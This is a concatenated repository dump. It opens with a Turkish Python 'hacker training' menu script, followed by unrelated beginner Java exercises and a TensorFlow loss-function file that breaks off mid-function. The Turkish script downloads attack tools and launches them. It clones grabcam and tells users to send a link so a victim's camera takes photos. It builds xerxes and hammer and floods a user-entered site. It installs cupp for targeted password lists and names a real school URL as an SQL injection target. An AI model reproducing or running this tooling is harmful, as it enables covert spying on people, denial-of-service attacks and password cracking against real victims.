BRUTE FORCE, PHP ENJEKSİYON, HTML ENJEKSİYON VE
BACKDOORLAR
Aslında Daha Fazla Açık Var Ama Bunlar En Bilinenler.
İsterseniz Bazılarına Göz Atalım
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="E" or dev=="e":
print("""\033[1m\033[92m
Xss Nedir?
XSS (Cross Site Scripting) script kodları üzerinden
(genelde javascript) bir web sayfasına saldırı yapılmasıdır.
Bu Saldırının 3'e ayrılır
1 Reflected XSS
2 Stored XSS
3 DOM Tabanlı XSS
Yukarıda Zararsızdan Zararlıya Doğru Sıraladık.
Xss Hakkında Daha Fazla Bilgi İçin Dökümanlara Göz Atabilirsiniz.
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="E" or dev=="e":
os.system("clear")
print("""\033[1m\033[92m
SQL Enjeksiyonu Nedir?
Sql Enjeksiyonu veri tabanı açıklarından kaynaklı bir açık türüdür.
Veri tabanının Bazı Karakterleri Engellemediğinden Dolayı Bazı Hatalar Oluşur.
Bu hatalar sebebi ile bilgi sızdırılabilir
Sql Zaafiyetlerini Bulmak İçin Sqlmap Aracını Kullanabilirsiniz
(Saep Hack-Tool Aracında Kurulumu Otomatik Olarak Yapıyor)
Bu Zaafiyetlerin Nasıl İstismar Edileceği Hakkında Bilgi İçin Dökümanlara Göz Atabilirsiniz.
Not: Sql Zaafiyeti Bulmak İçin Azda Olsa Sql Dili Bilmeniz Gerekir
Örneğin: SELECT, INSERT, UPDATE, DELETE, ALTER, DROP, CREATE, USE, SHOW
Yukarudaki Kodlar Sql Dilinden Bazı Kodlardı Bunları Kullanmayı Bilirseniz Zaafiyetleri İstismar Edebilirsiniz
Sql Zaafiyeti Uygulamak İçin Linkin Örnekteki Gibi Olması Gerekir
Örnek: https://www.delhijainschool.com/gallery.php?id=15
Bu Eğitimde Web Zaafiyetleri Bu Kadardı Bir Sönraki Eğitimde Daha Ayrıntılı
Bir Şekilde Web Syber Security Derslerine Devam Edeceğiz.
""")
elif ilk=="11":
os.system("clear")
print("""\033[1m\033[92m
Kamera Nasıl Hacklenir.
Hangi Kamera Olursa Olsun Bir Link Üzerinde Kameraya Erişim Sağlanabilir.
Bu Yüzden Kameralar Kullanılmadığı Sürece Kapatılmalıdır Ben Şahsen Kapatmıyorum
(Çünkü Bilgisayarımın Kamerası Yok \U0001f600)
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="E" or dev=="e":
os.system("clear")
print("Önce Gereken Aracı İndirelim")
os.system("sleep 2")
os.chdir("/data/data/com.termux/files/home")
os.system("clear")
os.system("git clone https://github.com/noob-hackers/grabcam.git")
os.chdir("/data/data/com.termux/files/home/grabcam")
os.system("chmod 777 *")
os.system("clear")
print("""\033[1m\033[92m
Şuan Aracımız Kuruldu Bu yazıdan Sonra "cd" yazıp ana dizine gidin sonra "cd grabcam" yazıpdosyaya gidin
ve "./grabcam.sh" yazarak programı çalıştırın ve ngrok olanı seçin (2. seçenek olması lazım)
Sonra Linki Kurbanınınza Gönderin Tıklartıklamaz resim çekicektır""")
elif ilk=="12":
print("""\033[1m\033[92m
Her ne kadar bunlar pek önemli olmasada bazen önemsiyoruz ama bunları yapmanızı pek önermem
zaten bununla ilgili pek çok bilgi var ama size ödev olarak bunu araştırın
bir hacker adayında olması gereken en önemli şey azmi olmasıdır. Azmi olmayan lamerlikten başka
birşey yapamaz.
Ödevinizi Unutmayın
""")
elif ilk=="13":
os.system("clear")
print("""\033[1m\033[92m
Evet Yazılımcı Olmak İsteyenler Çökün Bakayım.
Yazılım ile ilgili sektörleri 4'e Ayırabiliriz
En Bilinen Sektörler Aşağıdadır
1)Oyun Sektörü
2)Web Geliştirme Sektörü
3)Mobil Uygulama Sektörü
4)Yapay Zeka
Şimdi Sırayla İnceleyelim
""")
dev = input("Seçim Yapınız: ")
if dev=="1":
os.system("clear")
print("""\033[1m\033[92m
Oyun Sektörüde Aslında İkiye Ayrılır Ama Biz Şimdi
Bilgisayarlar İçin Oyun Sektörüne Göz Atacağız.
Hangi Yazılım Dillerini Bilmeniz Gerekir.
C# Veya C++
Ama İsterseniz Başka Bir Dilde Öğrenebilirsiniz Size Tavsiyem
Yazılımcı Olucaksanız Bu iki Dilden Birini Mutlaka Öğrenin.
Ne İle Yapılıyor Bu Oyunlar Hangi Uygulamalar Kullanılıyor
Unity Gibi Oyun Motorları Kullanılarak Yapılıyor
Bu oyun motorları sayesinde oyun yapmak çok daha kolay oluyor.
Oyun Yapmak Sadece Kodlardan İbaretmi ?
Tabikide Hayır. Bu Sektöre Bir Kere Girmeye Çalıştım Ama Bilgisayarım
Beni Yarı Yolda Bırakmasından Korktuğum İçin Giremesdim
Bu Sektöre Giriyorsanız Youtubeden Baka Baka Öğrenmeniz Zor Olur
Udemy.com adresinden Oyun Geliştirme Kursları almanızı Tavsiye Ederim
(Filitrelerden Ücretsizi Seçebilirsiniz \U0001f600)
""")
don=input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif dev=="2":
os.system("clear")
print("""\033[1m\033[92m
Hangi Dilleri Bilmeliyiz
HTML Bilmeniz Şart
Python, SQL, MYSQL, Php, CSS ve Java Bu Dillerde Kullanılır
Bir Web Geliştirici Olamk İstiyorsanız Veri Tabanlarını Bilmeniz Gerekir
Veri Tabanı Dilleri İse
SQL, SQLite, MYSQL vs. Bu Şekilde Gider
Bu Sektörde Gelişmek İstiyorsanız udemy.com'da Bir Sürü Ders Var Onlardan Alabilirsiniz.
""")
don=input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif dev=="3":
os.system("clear")
print("""\033[1m\033[92m
Mobil Uygulama Geliştirmek İçin Hangi Dilleri Bilmemiz Gerekir.
Eğer Android Uygulama Geliştirmek İstiyorsanız Kotlin Şart. Nasıl Yazılıyor Unuttum ?
Ama Ben İOS Uygılaması Yapıcam Diyorsanız Swift Dili Şarttır
Bir Kere Bir Bilgisayarınızın Olması Şart
Hangi Dili Yazmak İsyorsunuz Hangi Sektörde Olduğunuz Fark Etmez.
Bu Sektörlerin Hiçbirine Girmedim Sayılır Ayrıntılı Bilgiyi Dökümanlarda Bulabilirsiniz
""")
don=input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif dev=="4":
os.system("clear")
print("""\033[1m\033[92m
Çok Popüler Olan Bu Sektör
Ama Bu Alanla İlgili Bildiğim Birşey Varsa Yapay Zekalar
Kendini Geliştirebiliyor.
Size Bir Tavsiye Eğer Yapay Zeka İşine Gireceğim Diyorsanız Bilişim Derslerini Dinleyin Derim.
Bu Sektör İle İlgili Bildiğim Pek Birşey Yok Onun İçin Fazlada Söyleyeceğim Birşey Yok
""")
don=input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif ilk=="14":
os.system("clear")
print("""\033[1m\033[92m
İnternet Dediğimiz Zaman Aklımıza OSI Modeli Gelmesi Lazım
Peki Nedir Bu OSI Modeli?
osi modeli 7 layer'dan (katmandan) oluşur. Bu Katmanları Sıralıyalım.
Open System Interconnection
Physical -> Data cabel etc.
Data -> Switch, MAC Address
Network -> Route, IP Addresss
Transport -> TCP, UDP etc.
Session -> Communication
Presentation -> Jpeg, Mov, Data
Application -> HTTP, Mail Server etc.
Resimli Halini Dökümanlarda Bulabilirsiniz.
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="E" or dev=="e":
os.system("clear")
print("""\033[1m\033[92m
Katman 1
İnternetin Fiziksel Tarafıdır
Katman 2
Verinin İşlendiği Bölüm
Switch Ne İşe Yarar
Kendi Ağı İçindeki Mac Adreslerini Kullanarak İletişim Sağlar
Katman 3
IP Adresi Bu Katmanda İşlenir Modemde Burada İş Görüyor
Katman 4
Transport Adından Anlışlıcağı Üzere portlar Bu Kısımda İş Görüyor.
Dış Bağlantı Buradan Salnıyor Veri Alışverişi Yapılıyor.
Katman 5
Session Açma İşlemi Dediğimiz İşlem Burada Yapılıyor
Bağlantı ve İletişim İşlemlerinin Yapıldığı Katman
Katman 6
Verinin Görselleştirilmesi Bu Katmanda Yapılıyor
JPEG MOV DATA Gibi Şeylerin Bu Katmanda İşlediğini Söyleyebiliriz.
Katman 7
Uygulama Katmanı Olarak Geçer Mail Serverleri HTTP Gibi Serverler
Bu Katmanda İşliyor Her zaman Duyduğunuz Bu Site HTTP Bu Site HTTPS Kullanıyor
Gibi Terimlerin Ana Kaynağıdır Aslında
""")
ana = input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if ana=="e" or ana=="E":
os.system("python3 TEğitim.py")
elif ana=="h" or ana=="H":
exit()
elif ilk=="15":
os.system("clear")
print("""\033[1m\033[92m
Bir Kullanıcı Adının Hangi Sitelerde Kullanıldığını Görmek Ne İşe Yarar?
Devam
Kişiye Saldırılarda Lazım Olan Bir Bilgi
""")
don = input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif don=="h" or don=="H":
exit()
elif ilk=="16":
os.system("clear")
print("""\033[1m\033[92m
DDOS Nedir
DDoS yani Distributed Denial of Service (Dağıtık Hizmet Engelleme) saldırıları, tamamen Bilgi Güvenliği unsurlarından
Erişilebilirliği hedef almaktadır. Öncesinde sadece DoS (Denial of Service), yani tek bir kaynaktan hedefe doğru saldırı
yapılması şeklinde ortaya çıkan bu saldırı türü, zamanla şiddetinin arttırılması için çok sayıda kaynaktan tek hedefe yapılan
saldırı şekline dönüşmüştür
Bu Yaman Efkarın DDOS Hakkındaki anlatımı
DDOS Bir servisin bir bilgisayar veya bir dijital makine üzerinden paketler göndererek
hedefin devre dışı bırakılmasını sağlayan bir siber saldırıdır. DDOS'un Tanımı
Denial of Service (Dağıtık Hizmet Engelleme) gibidir(Yukarıdakini kopyaladım)
bu DDOS saldırıları kendi içinde çok dallara ayrılır
örneğin: SYN flood, ACK flood, ICMP flood gibi
(TAFSİLAT BÖLÜMÜ)
Bu gibi saldırılar yapmak için hedefte bir portun açık olması lazımdır
eğer bir ip bulup buna ben hemen ddos atarım diyorsanız yanılıyorsunuz
web sitelerinde zaten port açmak zorundalar ama istediğiniz portu yazamazsınız
""")
elif ilk=="17":
os.system("clear")
print("""\033[1m\033[92m
DDOS Atmak İçin Bir Sürü Tool Var Ama Biz Bazılarını Özel Olarak Ayırıyoruz
Daha Fazla Ayrıntı İçin Dökümanlara Göz Atabilirsiniz.
Size 2 Tool Göstereceğim İkiside Güzel Araçlar
1)xerxes
2)Hammer
""")
dev = input("Seçim Yapınız: ")
if dev=="1":
os.system("clear")
os.system("pkg install git")
os.system("pkg install clang")
os.chdir("/data/data/com.termux/files/home")
os.system("git clone https://github.com/zanyarjamal/xerxes")
os.chdir("/data/data/com.termux/files/home/xerxes")
os.system("chmod 777 xerxes.c")
os.system("clang xerxes.c -o xerxes")
os.system("clear")
t = input("Tool Kuruldu DDOS Atmak İstermisiniz [E/h] ")
if t=="e" or t=="E":
d = input("Site Adı Giriniz: ")
os.system("./xerxes " + d + " 80")
elif dev=="2":
os.system("clear")
os.system("pkg install git")
os.chdir("/data/data/com.termux/files/home")
os.system("git clone https://github.com/cyweb/hammer.git")
os.chdir("/data/data/com.termux/files/home/hammer")
t = input("Tool Kuruldu DDOS Atmak İstermisiniz [E/h] ")
if t=="e" or t=="E":
d = input("Site Adı Giriniz: ")
os.system("python3 hammer.py -s " + d + "-p 80 -t 200")
elif dev=="h" or dev=="H":
exit()
elif ilk=="18":
os.system("clear")
print("""\033[1m\033[92m
Benim Olmayan Ama Sanalcı Arkadaşlarımın Hazırlamış Olduğu Methodlar
Hack Yöntemleri Ve Daha Bir Sürü Bilgi Buradaki Linklerden Ulaşabilirsiniz
Yaman Efkarın Videolu seti
https://www.turkhackteam.org/google-android/1750135-termux-nedir-termux-hack-paketi.html
Saepin Eğitim Seti Var Dökümanlarda Bulabilirsiniz
""")
elif ilk=="19":
os.system("clear")
print("""\033[1m\033[92m
Parola Listesi Oluşturmak İçin Araçlar Var wordlist Adında
Bir Araç Var Ama Biz crunch Aracını Kullanıcağız
apt install crunch Diyerek Kurabilirsiniz
Nasıl Kullanılır
crunch "min kaç hane" "max kaç hane" "kullanılacak karakterler" -o "dosya adı.txt"
""")
elif ilk=="20":
os.system("clear")
print("""\033[1m\033[92m
Kişiye özel şifre listesi oluşturmak için cupp isimli aracı kullanacağız
Kısaca size cupp aracından bahsedeyim cupp Ortak Kullanıcı Parolaları Profilcisi anlamına gelir
Bu araç lisans penetrasyon testleri veya adli suç soruşturmaları gibi birçok durumda kullanılabilir,
CUPP bir platformdur ve Python’da yazılmıştır ve çalışması basit ama çok güçlü sonuçlarla.
Bu uygulama, bir bireye göre uyarlanmış hedeflenmiş şifre sözlükleri oluşturma konusunda bir sosyal mühendisin en iyi arkadaşıdır.-Cupp asyfasından alıntıdır.""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="E" or dev=="e":
os.system("clear")
print("Önce Gereken Aracı İndirelim")
os.system("sleep 2")
os.chdir("/data/data/com.termux/files/home")
os.system("clear")
os.system("git clone https://github.com/Mebus/cupp")
os.chdir("/data/data/com.termux/files/home/cupp")
os.system("chmod 777 *")
os.system("clear")
print("""\033[1m\033[92m
Şuan Aracımız Kuruldu Bu yazıdan Sonra "cd" yazıp ana dizine gidin sonra "cd cupp" yazıp dosyaya gidin "ls" yazıp dizini görüntüleyin ve
"python3 cupp.py" yazın gelen yerlerde bbilgileri doldurun en sonsa ise wordlist adını yazın ve wordlistiniz hazır""")
elif dev=="h" or dev=="H":
exit()
elif ilk=="21":
print("""\033[1m
\033[92m Yapımcılar (Makro-Saep) Eğitim setini aldığın için teşekkürler ilk eğitim setimizdi
takıldığın bir yer olursa instagramdan yazmayı unutma!!!
İnstagram adreslerimiz = @saep_official_ / _m4kr0""")
elif ilk=="q" or "Q":
os.system("clear")<file_sep>/README.md
# Saep
First tool training
## Installation
``apt install git -y &&
apt install python python2 -y
&& git clone https://github.com/saepsh/saep &&
cd saep && clear &&
python3 TEğitim.py``
------------------------
### <NAME>
> [INSTAGRAM](https://Instagram.com/saep_official_/)
<file_sep>/TEğitim Döküman/Saep Set/desktop.ini
[LocalizedFileNames]
Bilgisayar Kamerası Hackleme.txt=@Bilgisayar Kamerası Hackleme,0
|
42e5a36eb053cf94fb4ee91b5fb3b00ada7c8311
|
[
"Markdown",
"Python",
"INI"
] | 4
|
Python
|
asetrsaepdeneme/saep
|
81bbf7db98e983f0db723b223ebd9fddc1c8a550
|
7970097fd571ac1bef0d4dbd0630b2fd0a0b84af
|
refs/heads/master
|
<repo_name>Aytaj123/javaprogramming2<file_sep>/src/day30_arrays/StringTrimPractice.java
package day30_arrays;
public class StringTrimPractice {
public static void main(String[] args) {
String word = "Winter is coming";
word = word.trim();
System.out.println(word.length());
String a = "123";
String b = 5+4+a;
System.out.println(b);
String result = 3425 > (9*1000) ? "garden" : "patio";
result.substring(2);
System.out.println(result);
String str = "the fox ran under the bridge";
str = str.substring(4,17);
str.toUpperCase();
System.out.println(str + "ground");
String s = "the game was tied at 2-2";
String s2 = s.substring(5);
int index1 = s.indexOf("game");
int index2 = s2.indexOf("game");
if (index1 == index2) {
System.out.println(index1);
} else {
System.out.println(index2);
}
}
}
<file_sep>/src/day24_loops/Loop3.java
package day24_loops;
public class Loop3 {
public static void main(String[] args) {
int z = 5;
for ( int i = 5; i > 0; i--) {
z += 1;
}
System.out.println(z);
}
}
<file_sep>/src/day37_methods_overloading/VarArgs.java
package day37_methods_overloading;
public class VarArgs {
public static void main(String[] args) {
addNumbers(10, 5);
addNumbers(100, 200, 300);
addNumbers(23, 45, 17, 3, 7, 54, 98, 2, 13, 3, 65, 76, 4, 16, 5, 24); // it's thanks to ... (unlimited)
addNumbers();
}
public static void addNumbers (int...nums ) {
int sum = 0;
for (int n : nums) {
sum += n;
}
System.out.println("sum = " + sum);
}
}
<file_sep>/src/day09_scanner_practice/SalaryCalculatorV2.java
package day09_scanner_practice;
import java.util.Scanner;
public class SalaryCalculatorV2 {
public static void main(String[] args) {
}
}
<file_sep>/src/day40_arraylist/ArrayListLoop.java
package day40_arraylist;
import java. util.*;
public class ArrayListLoop {
public static void main(String[] args) {
List <Integer> nums = new ArrayList<>(); // polymorphic way of declaring
System.out.println(nums);
System.out.println("Size = " + nums.size());
nums.add(34); nums.add(44); nums.add(2); nums.add(26); nums.add(500); nums.add(5); nums.add(0); nums.add(17);
nums.add(65); nums.add(12); nums.add(1);
System.out.println("nums = " + nums);
nums.remove(0); // remove 1st one
System.out.println("nums = " + nums);
        //nums.remove(88); // 88 would be treated as an index, which throws an IndexOutOfBoundsException
        nums.remove(new Integer(44)); //this is how to remove by value rather than by index
System.out.println("nums = " + nums);
//for loop - iterate through all values and print
for (int i = 0; i < nums.size(); i++ ) {
System.out.println(nums.get(i));
}
//for each loop , and print all in the same line
for (Integer each : nums ) {
System.out.print(each +" ");
}
}
}
<file_sep>/src/day23_string_manipulation_while_loop/Practice.java
package day23_string_manipulation_while_loop;
public class Practice {
public static void main(String[] args) {
String s = "I will find the lost book";
String word = "";
        for (int index = s.length()-1; index >= 0; index-- ) {
word += s.charAt(index);
}
System.out.println(word);
String str = "cybertek";
        for (int i = 0; i < str.length(); i+=2 ) {
System.out.println(str.charAt(i));
}
}
}
<file_sep>/src/day33_arrays/GroupFriends.java
package day33_arrays;
public class GroupFriends {
public static void main(String[] args) {
// 0 1 2 3
String [] friends = {"Saim", "Nadir","Murodil" , "Suleyman", };
for (String each : friends) {
System.out.println("Happy holidays = " + each + "!");
}
}
}
<file_sep>/src/day04_variables_intro/FirstVariables.java
package day04_variables_intro;
public class FirstVariables {
public static void main(String[] args) {
//declare variable n that can store int(whole numbers)
int n;
//assign/put value 10 to n
n = 10;
//print value of n variable
System.out.println(n);
}
}
<file_sep>/src/day39_wrapper_classes/WrapperClassMethods.java
package day39_wrapper_classes;
import java.awt.geom.Line2D;
public class WrapperClassMethods {
public static void main(String[] args) {
System.out.println(Integer.max(5,10));
System.out.println(Integer.sum(15,35));
System.out.println(Integer.min(3, 78));
System.out.println(Integer.compare(5, 8));
System.out.println("MIN INT: " + Integer.MIN_VALUE);
System.out.println(Double.max(234.4,23.9));
System.out.println(Double.compare(5,1));
System.out.println(Double.compare(5,5));
System.out.println(Double.compare(5,45));
System.out.println(Character.isDigit('8'));
System.out.println(Character.isDigit('v'));
char letter = 'A';
if (Character.isUpperCase(letter)) {
System.out.println("It is an upppercase");
}
String word = "JaVa iS FuN";
for (int i = 0; i < word.length(); i++) {
if (Character.isUpperCase(word.charAt(i))) {
System.out.print(word.charAt(i));
}
}
System.out.println(Character.MIN_VALUE);
System.out.println(Character.MAX_VALUE);
System.out.println(Boolean.TRUE);
}
}
<file_sep>/src/day32_arrays_split/SentenceSplit.java
package day32_arrays_split;
public class SentenceSplit {
public static void main(String[] args) {
String sentence = "Java is fun";
String [] words = sentence.split(" ");
System.out.println("First word = " + words[0]);
System.out.println("Second word = " + words[1]);
System.out.println("Third word = " + words[2]);
// System.out.println("Fourth word = " + words[3]); out of bound
for (String w : words) {
System.out.println(w);
}
String googleResult = "About 1,810,000 results (0.68 seconds)";
System.out.println(googleResult.split(" ")[1] + " = result");
System.out.println(googleResult.split(" ")[3].replace("("," ") + " = seconds");
}
}
<file_sep>/src/day09_scanner_practice/TemperatureConverter.java
package day09_scanner_practice;
import java.util.Scanner;
public class TemperatureConverter {
public static void main(String[] args) {
Scanner scan = new Scanner(System.in);
System.out.println(" ##### F TO C CONVERTER ##### ");
System.out.println("Enter Fahrenheit value:");
double fahrenheitValue = scan.nextDouble();
double celciusValue = (fahrenheitValue - 32) * 5 / 9;
System.out.println(fahrenheitValue + " F is in C " + celciusValue);
}
}
<file_sep>/src/day32_arrays_split/ShoppingItems.java
package day32_arrays_split;
public class ShoppingItems {
public static void main(String[] args) {
// 0 1 2 3 4 5
String[] items = {"Shoes", "Jacket","Gloves", "Airpods", "iPad", "iphone 12 case" };
double[] prices = { 99.99, 150.0, 9.99, 250.0 , 439.50, 39.99};
int[] itemIDs = {12345 , 12346, 12347, 12348, 12349, 12350};
System.out.println("-----FIND AN INDEX OF 'Gloves' in items array-----");
//use for loop with conditions
for (int i = 0; i < items.length; i++) {
if (items[i].equals("Gloves")){
System.out.println("Gloves were found at index " + i);
break;
}
// System.out.println(i + "-" + items[i]);
}
System.out.println("-----Set boolean to true if IPAD is found-----");
boolean iPadExists = false;
for (int i = 0; i < items.length; i++ ) {
if (items[i].equals("iPad" ) ) {
iPadExists = true;
break;
}
}
System.out.println("iPadExists = " + iPadExists);
System.out.println("-----Print a report of each shopping item-----");
for (int i = 0; i < items.length; i++) {
System.out.println(items[i] + " - $" +prices[i] + " - #" + itemIDs[i]);
//break;
}
System.out.println("-----Print all details about the jacket-----");
for (int i = 0; i < items.length; i++) {
if (items[i].equalsIgnoreCase("Jacket") ) {
System.out.println(items[i] + " - $" + prices[i] + " - #" + itemIDs[i]);
}
}
}
}
<file_sep>/src/day31_arrays/BinarySearch.java
package day31_arrays;
import java.util.*;
public class BinarySearch {
public static void main(String[] args) {
int [] nums = {23, 123, 654, 2344, 12345, 14421};
System.out.println(Arrays.binarySearch(nums,23));
System.out.println(Arrays.binarySearch(nums, 2344));
System.out.println(Arrays.binarySearch(nums, 25));
System.out.println(Arrays.binarySearch(nums, 700));
System.out.println(Arrays.binarySearch(nums, -5));
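        // Note: the last three values are not present in the array, so Arrays.binarySearch
        // returns -(insertionPoint) - 1, i.e. 25 -> -2, 700 -> -4, -5 -> -1.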
}
}
<file_sep>/src/day03_escape_sequence/EmployeeInfo.java
package day03_escape_sequence;
public class EmployeeInfo {
public static void main(String[] args) {
System.out.println("Company name:\tGoogle\nEmployee:\t\tAytaj");
}
}
<file_sep>/src/day06_arithmetic_operators/arithmeticOperatorsPractice.java
package day06_arithmetic_operators;
public class arithmeticOperatorsPractice {
public static void main(String[] args) {
//short s = 13 - 9/3 * 10
//s += -10
//System.out.println(s);
//int a = 10
//a = --a + a++ + a-- + a++
//System.out.println(a);
//short s = 13 + 3 * (10-6) % 2
//boolean b = s != 25
//System.out.println(b);
//byte b = 104
//boolean check = b < 100
double decimal = 13.142;
int whole = decimal < 20 ? 20 : 10;
System.out.println(whole);
}
}
<file_sep>/src/day34_void_methods/StartCheapCar.java
package day34_void_methods;
public class StartCheapCar {
public static void main(String[] args) {
//seatInCar();
//startTheCar();
//shiftToDrive();
//pressGasPedal();
}
}
<file_sep>/src/day45_oop/CoffeeObject.java
package day45_oop;
public class CoffeeObject {
public static void main(String[] args) {
Coffee latte = new Coffee();
System.out.println("Coffee amount = " + latte.getAmount());
latte.refill();
System.out.println("Amount after refill = " + latte.getAmount());
latte.drink(10);
System.out.println("Amount after drinking = " + latte.getAmount());
//NOT: myCoffee.type = "Turkish coffee"; INSTEAD using a method
latte.setType("Turkish coffee");
System.out.println("My Coffee = " + latte.getType());
//describe my coffee - show all variable values
System.out.println(latte.toString());
}
}
<file_sep>/src/day34_void_methods/EtsySearchTest.java
package day34_void_methods;
//import com.sun.xml.internal.ws.api.model.wsdl.WSDLOutput;
public class EtsySearchTest {
public static void main(String[] args) {
System.out.println("-----Starting Etsy search smoke test-----");
openBrowser();
navigateToEtsyUrl();
searchForWoodenSpoon();
verifyResultsAreDisplayed();
System.out.println("-----Etsy search smoke test is completed-----");
}
public static void openBrowser() {
System.out.println("1. Launching the Chrome browser");
}
public static void navigateToEtsyUrl() {
System.out.println("2. Navigate to etsy - https://www.etsy.com/");
}
public static void searchForWoodenSpoon() {
System.out.println("3. Search for a wooden spoon");
}
public static void verifyResultsAreDisplayed() {
System.out.println("4. Verify results");
}
}
<file_sep>/src/day03_escape_sequence/ShoppingReceipt.java
package day03_escape_sequence;
public class ShoppingReceipt {
public static void main(String[] args) {
System.out.println();
System.out.println("********************");
System.out.println();
System.out.println("--------------------");
System.out.println();
System.out.println("Cake $24");
System.out.println();
System.out.println("Bread $4.25");
System.out.println();
System.out.println("--------------------");
System.out.println("TOTAL AMOUNT: $28.25");
}
}
|
8a0175882b77892ee9c3240e5a3b26e611b20a28
|
[
"Java"
] | 19
|
Java
|
Aytaj123/javaprogramming2
|
7b628db7fff5e133d75789503c03b0a424112603
|
ba3573404fd198b9b3b49f3c908c9b8b491ff3e5
|
refs/heads/master
|
<file_sep>"""This file contains utility functions used for loss"""
import tensorflow as tf
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
EPSILON = 0.00001
def loss(logits, labels, type='xentropy', loss_params={}):
"""Loss function
Args:
logits: prediction before sigmoid
labels: one-hot encoded prediction
        type: type of loss, can be one of the following
            'xentropy': element-wise sigmoid cross entropy
            'bounded_xentropy': sigmoid cross entropy bounded away from 0 and 1 by `xentropy_epsilon`
            'weighted_xentropy': sigmoid cross entropy with a global positive-class weight
            'l2_distance': squared error between labels and logits
            'pos_weighted_l2_distance': masked, position-weighted squared error
            'l4_distance', 'l2_4_distance', 'flat_bottom_l3_distance', 'l4_log_loss': other distance-based losses
            'subclass_weighted_xentropy': sigmoid cross entropy with a per-class positive weight
            'focal_loss': focal loss (see focal_loss() below)
            'dice': soft Dice loss on sigmoid outputs
            'dice_2_class': two-class soft Dice loss on softmax outputs
            'single_class': single class, single label prediction (mutually exclusive)
loss_params: dictionary with the following keys:
'xentropy_epsilon'
'focal_loss_gamma_p'
'focal_loss_gamma_n'
'focal_loss_alpha'
'pos_weight_factor'
'position_weight_flag'
Returns:
loss_: A float tensor containing the overall loss value
Note:
For mutually-exclusive multi-label classification, use softmax cross entropy. This is NOT currently implemented.
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels, logits=logits, name='xentropy')
"""
# use sigmoid_cross_entropy_with_logits for multi-label classification
# get loss params
xentropy_epsilon = loss_params.get('xentropy_epsilon', 0.01)
focal_loss_gamma_p = loss_params.get('focal_loss_gamma_p', 2)
focal_loss_gamma_n = loss_params.get('focal_loss_gamma_n', 2)
focal_loss_alpha = loss_params.get('focal_loss_alpha', 0.25)
pos_weight_factor = loss_params.get('pos_weight_factor', 1)
labels = tf.to_float(labels, name='ToFloat') # to accommodate `sigmoid_cross_entropy_with_logits`
if type == 'xentropy':
cross_entropy = tf.nn.sigmoid_cross_entropy_with_logits(labels=labels, logits=logits, name='xentropy')
elif type == 'bounded_xentropy':
cross_entropy = bounded_sigmoid_cross_entropy_with_logits(labels=labels, logits=logits,
epsilon=xentropy_epsilon, name='xentropy')
elif type == 'weighted_xentropy':
num_total = tf.to_float(tf.size(labels))
num_positives = tf.reduce_sum(labels)
num_negatives = num_total - num_positives
pos_weight = pos_weight_factor * num_negatives / (num_positives + EPSILON)
cross_entropy = tf.nn.weighted_cross_entropy_with_logits(targets=labels, logits=logits,
pos_weight=pos_weight, name='xentropy')
cross_entropy = num_total / num_negatives * cross_entropy
elif type == 'subclass_weighted_xentropy':
num_total = tf.to_float(tf.shape(labels)[0])
num_positives = tf.reduce_sum(labels, axis=0)
num_negatives = num_total - num_positives
pos_weight = pos_weight_factor * num_negatives / (num_positives + EPSILON)
cross_entropy = tf.nn.weighted_cross_entropy_with_logits(targets=labels, logits=logits,
pos_weight=pos_weight, name='xentropy')
cross_entropy = num_total / num_negatives * cross_entropy
print('pos weight dimension {}'.format(pos_weight.get_shape()))
print('labels dimension {}'.format(labels.get_shape()))
print('cross_entropy dimension {}'.format(cross_entropy.get_shape()))
elif type == 'focal_loss':
cross_entropy = focal_loss(prediction_tensor=logits, target_tensor=labels,
alpha=focal_loss_alpha,
gamma_p=focal_loss_gamma_p,
gamma_n=focal_loss_gamma_n)
cross_entropy = tf.reshape(cross_entropy, [-1])
cross_entropy = tf.map_fn(nan_guard, cross_entropy)
    elif type == 'single_class':
        # mutually exclusive single-label prediction; note that
        # sparse_softmax_cross_entropy_with_logits expects integer class indices in `labels`
        cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels, logits=logits,
                                                                       name='xentropy')
elif type == 'l2_distance':
# this is not by definition `cross_entropy`, but we use it anyway for loss calc
cross_entropy = (labels - logits) ** 2
elif type == 'pos_weighted_l2_distance':
# NB. add weighs
# slice logits and labels where labels is greater than -100
position_weight_dict = {
1: 1,
2: [0, 0, 1, 1],
3: [0, 0, 1, 1, 0],
4: [0, 0, 1, 1, 1, 1, 1], # no muscle
5: [0, 0, 0, 0, 1, 1, 0], # mlo nipple only
}
position_weight_list = position_weight_dict[loss_params.get('position_weight_flag', 1)]
mask = tf.cast(tf.greater(labels, -100), tf.float32)
cross_entropy = ((labels - logits) * position_weight_list * mask) ** 2
# add to tensorboard
loss_muscle = tf.reduce_mean(cross_entropy[:2])
loss_nipple_cc = tf.reduce_mean(cross_entropy[2:4])
loss_nipple_mlo = tf.reduce_mean(cross_entropy[4:6])
loss_density = tf.reduce_mean(cross_entropy[6:])
tf.summary.scalar('loss_muscle', loss_muscle)
tf.summary.scalar('loss_nipple_cc', loss_nipple_cc)
tf.summary.scalar('loss_nipple_mlo', loss_nipple_mlo)
tf.summary.scalar('loss_density', loss_density)
# tf.summary.value.add(tag='loss_muscle', simple_value=avg_valid_loss)
elif type == 'l4_distance':
cross_entropy = (labels - logits) ** 4
elif type == 'l2_4_distance':
def l2_4_loss_fn(d):
# This maps scalar tensor (rank-0 tensor) to scalar
return tf.case(
pred_fn_pairs=[
(tf.abs(d) <= 1, lambda: 2 * (d ** 2))],
default=lambda: d ** 4 + 1, exclusive=True)
difference = labels - logits
orig_shape = tf.shape(difference) # NB. a.get_shape() is equivalent to a.shape and returns static shape
